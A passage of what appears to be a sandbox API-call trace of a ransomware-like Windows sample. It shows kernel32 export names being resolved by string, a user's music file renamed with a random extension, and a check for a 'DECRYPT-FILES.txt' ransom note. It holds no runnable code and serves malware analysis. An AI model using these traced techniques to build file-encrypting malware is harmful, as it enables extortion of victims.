(lpString="CREATEEVENTW") returned 12 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.834] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.834] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.834] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.835] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.835] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.835] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.835] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.835] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.835] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.835] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.835] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.835] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.835] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.835] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.835] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.835] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.835] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.835] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.835] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.835] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.835] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.835] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.836] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.836] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.836] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.836] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.836] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.836] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.836] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.836] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.836] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.836] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.836] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.836] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.836] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.836] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.836] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.836] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.836] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.836] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.836] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.837] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.837] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.837] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.837] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.837] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.837] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.837] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.837] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.837] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.837] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.837] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.837] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.837] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.837] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.837] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.837] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.837] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.837] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.837] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.838] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.838] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.838] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.838] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.838] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.838] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.838] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.838] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.838] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.838] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.838] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.838] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.838] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.838] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.838] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.838] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.838] lstrlenA (lpString="DELETEATOM") returned 10 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.838] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.838] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.838] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.839] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.839] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.839] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.839] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.839] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.839] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.839] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.839] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.839] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.839] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.839] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.839] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.839] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.839] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.839] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.839] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.839] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.839] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.839] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.840] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.840] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.840] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.840] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.840] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.840] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.840] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.840] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.840] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.840] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.840] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.840] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.840] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.840] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.840] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.840] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.840] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.840] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.841] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.841] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.841] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.841] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.841] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.841] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.841] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.841] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\fRU1utAoUZpSLIvF.mp3") returned 98 [0085.841] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\fRU1utAoUZpSLIvF.mp3.7hO0") returned 103 [0085.841] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\fRU1utAoUZpSLIvF.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\fru1utaouzpslivf.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\fRU1utAoUZpSLIvF.mp3.7hO0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\fru1utaouzpslivf.mp3.7ho0"), dwFlags=0x0) returned 1 [0085.842] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.842] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.842] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.842] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf593640, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf593640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf593640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.842] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.842] lstrcmpiW 